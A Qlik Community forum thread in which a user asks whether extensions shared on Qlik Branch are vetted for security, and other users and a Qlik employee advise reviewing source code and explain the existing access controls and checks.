Skip to main content

Qlik

cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Not applicable
‎2016-05-03 03:38 AM

Qlik Branch Extension Security/Verification

Does Qlik verify the contributions or projects on Qlik Branch? If not, is there a way for Qlik users to certify that particular extensions are safe or do not have glaring vulnerabilities? Some of our clients are concerned about allowing unverified third-party Javascript packages to run on their servers.

Thanks in advance.

Cheers,

Andrew

1,014 Views
0 Likes
3 Replies
Not applicable
‎2016-05-03 01:12 PM
Author

Branch content is completely open source and so under the same evaluation of the open source community. Read the source code carefully and when in doubt, dont use.

543 Views
0 Likes
swuehl
MVP
MVP
‎2016-05-03 01:22 PM

Maybe also have a look at Alexander's comment here:

Can extensions carry security risk? | Qlik Community

543 Views
0 Likes
Alexander_Thor
Employee
Employee
‎2016-05-04 12:48 PM

Hey Andrew,

As other poster stated I would recommend _everyone_ to verify the source code on their own.

You wouldn't copy / paste a load script from a page on the internet into your app and the same rule of thumb should go for Extensions.

Now with that said, since extensions are just normal objects the usual section access and security rules apply so a extension can't access anything apart from what the user is allowed to see. We also do checks for click-jacking and obvious malicious code for the projects posted on Branch.

543 Views
0 Likes